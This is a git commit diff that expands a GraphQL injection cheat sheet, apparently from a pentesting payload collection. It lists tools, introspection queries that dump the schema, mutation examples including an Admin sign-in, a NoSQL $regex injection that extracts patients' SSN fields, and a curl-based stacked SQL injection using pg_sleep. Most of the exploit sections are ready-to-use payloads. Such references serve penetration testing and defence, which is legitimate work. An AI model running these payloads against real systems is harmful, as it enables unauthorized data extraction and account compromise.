GraphQL injection : blind nosqli + sqli

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Swissky 2019-06-21 17:01:43 +02:00
parent 9745e67465
commit c3f96c6753

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@ -2,30 +2,54 @@
> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
## Summary
* [Tools](#tools)
* [Exploit](#exploit)
* [Identify an injection point](#identify-an-injection-point)
* [Enumerate Database Schema via Instropection](#enumerate-database-schema-via-introspection)
* [Extract data](#extract-data)
* [Enumerate the types' definition](#enumerate-the-type-definition)
* [Use mutations](#use-mutations)
* [NOSQL injection](#nosql-injection)
* [SQL injection](#sql-injection)
* [References](#references)
## Tools
* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](
* [GraphQL Security Toolkit - GraphQL Security Research Material](
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](
## Exploit
### Identify an injection point
Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
Check if errors are visible
Check if errors are visible.
### Extract data
### Enumerate Database Schema via Introspection
URL encoded query to dump the database schema.
![HTB Help - GraphQL injection](
### Enumerate Database Schema with the following GraphQL query
URL decoded query to dump the database schema.
fragment FullType on __Type {
@ -124,14 +148,67 @@ query IntrospectionQuery {
### Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
### Extract data
![HTB Help - GraphQL injection](
### Enumerate the types' definition
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
### Use mutations
Mutations work like function, you can use them to interact with the GraphQL.
# mutation{signIn(login:"Admin", password:"secretp@ssw0rd"){token}}
# mutation{addUser(id:"1", name:"Dan Abramov", email:"") {id name email}}
### NOSQL injection
Use `$regex`, `$ne` from []() inside a `search` parameter.
options: "{\"limit\": 1, \"patients.ssn\" :1}",
search: "{ \"patients.ssn\": { \"$regex\": \".*\"}, \"lastName\":\"Admin\" }")
firstName lastName id patients{ssn}
### SQL injection
Simple SQL injection inside a graphql field.
curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27
## References
* [Introduction to GraphQL](
* [GraphQL Introspection](
* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](
* [GraphQL abuse: Bypass account level permissions through parameter smuggling - March 14, 2018 - @Detectify](
* [Discovering GraphQL endpoints and SQLi vulnerabilities - Sep 23, 2018 - Matías Choren](
* [Securing Your GraphQL API from Malicious Queries - Feb 21, 2018 - Max Stoiber](
* [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](
* [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](